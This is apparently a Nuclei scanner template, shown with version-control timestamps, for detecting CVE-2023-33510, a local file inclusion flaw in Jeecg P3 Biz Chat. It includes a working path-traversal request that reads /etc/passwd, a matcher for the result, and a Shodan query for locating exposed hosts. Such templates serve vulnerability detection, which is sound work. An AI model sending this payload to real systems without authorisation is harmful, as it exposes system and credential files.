2023-06-19 09:56:15 +00:00
id : CVE-2023-33510
info :
name : Jeecg P3 Biz Chat - Local File Inclusion
author : DhiyaneshDK
severity : high
description : |
Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
2023-09-06 11:43:37 +00:00
remediation : |
Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in Jeecg P3 Biz Chat.
2023-06-19 09:56:15 +00:00
reference :
- https://twitter.com/momika233/status/1670701256535572481
- https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33510
2024-01-29 17:11:14 +00:00
- https://github.com/izj007/wechat
2023-06-19 09:56:15 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-33510
cwe-id : CWE-668
2023-08-31 11:46:18 +00:00
epss-score : 0.00347
2024-01-29 17:11:14 +00:00
epss-percentile : 0.6879
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:*
2023-06-19 09:56:15 +00:00
metadata :
verified : "true"
2023-09-06 11:43:37 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : jeecg_p3_biz_chat_project
product : jeecg_p3_biz_chat
2023-09-06 11:43:37 +00:00
framework : wordpress
shodan-query : http.favicon.hash:1380908726
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress
2023-06-19 09:56:15 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "root:.*:0:0:"
- type : status
status :
- 200
2024-01-30 06:46:18 +00:00
# digest: 4b0a004830460221009e162dbb1787d5c8b032abe3bf70bb51a039c53b2df9c8e71d5971b297d962bb0221009b98beb3b2add0df90bddc57c9ed57f15adc1f361360d012658f5c9e2265d724:922c64590222798bb761d5b6d8e72950